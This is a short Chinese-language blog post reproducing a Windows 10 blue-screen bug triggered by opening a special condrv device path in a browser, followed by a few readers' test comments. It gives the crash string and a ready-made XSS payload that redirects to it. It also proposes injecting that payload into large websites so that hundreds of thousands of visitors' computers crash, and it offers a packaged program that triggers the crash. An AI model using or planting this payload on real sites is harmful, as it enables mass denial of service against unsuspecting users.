前言
2021年1月19日,win10蓝屏漏洞从网络上蔓延开来,而且只需要一行代码,即可让你的电脑蓝屏崩溃,接下来我们来看复现过程。
0x1
在Chrome浏览器中输入一行代码就会引起蓝屏代码
\\.\globalroot\device\condrv\kernelconnect
0x2
但是如果用IE浏览器的话就不会出现蓝屏,如下图(不愧是IE,安全高,反应慢)
0x3
虽然说,危害不是特别大的吧,但是!如果大型网站被注入xss的话,那将每天就有几十万的电脑蓝屏。比如说:插入以下xss代码
'><scrIpt>alert(window.location.href='\\.\globalroot\device\condrv\kernelconnect')</script>那你每次打开这个网站电脑都会蓝屏。
还有,这个代码调用了一个程序,而这个程序我会打包。
运行这个程序也是会蓝屏的,请勿用于非法用途!
我来测试一下说道: 
Safari 
iPhone iOS 14.3
小弟说道: 
Google Chrome 
Windows 7
QQbrowser 
Android 10
lx说道: 
Windows 10